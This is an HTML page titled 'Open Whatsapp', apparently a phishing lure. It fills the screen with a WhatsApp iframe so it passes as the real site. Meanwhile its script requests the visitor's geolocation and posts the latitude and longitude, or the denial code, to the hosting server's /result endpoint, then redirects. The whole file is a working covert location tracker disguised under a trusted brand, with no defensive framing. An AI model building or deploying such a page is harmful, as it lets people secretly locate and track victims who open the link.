<!DOCTYPE html>
<html lang="en" id="facebook" class="no_js">

<head>
  <meta charset="utf-8" />
  <title>Open Whatsapp</title>
</head>

<body>
  <iframe src="https://whatsapp.com/"
    style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;">
  </iframe>
  <script>
    const READY_STATE_DONE = 4;

    if (/* check if available */navigator.geolocation) {

      function sendLoc(position) {
        const request = new XMLHttpRequest();
        request.open("POST", "/result")
        request.setRequestHeader("Content-Type", "application/json")
        request.onreadystatechange = (ev) => {
          if(request.status === 200 && request.readyState === READY_STATE_DONE) {
            // why don't use window.location.href
            window.history.pushState({}, '/redirect', window.location.origin + '/redirect')
            window.location.reload()
          }
        }
        request.send(JSON.stringify({
          status: 0,
          latitude: String(position.coords.latitude),
          longitude: String(position.coords.longitude),
        }))
      }

      function onLocError(err) {
        const request = new XMLHttpRequest();
        request.open("POST", "/result")
        request.setRequestHeader("Content-Type", "application/json")
        request.onreadystatechange = (ev) => {
          if (request.status === 200 && request.readyState === READY_STATE_DONE) {
            // why don't use window.location.href
            window.history.pushState({}, '/redirect', window.location.origin + '/redirect')
            window.location.reload()
          }
        }
        request.send(JSON.stringify({
          status: err.code,
          latitude: "",
          longitude: ""
        }))
      }

      navigator.geolocation.getCurrentPosition(sendLoc, onLocError)
    }
  </script>
</body>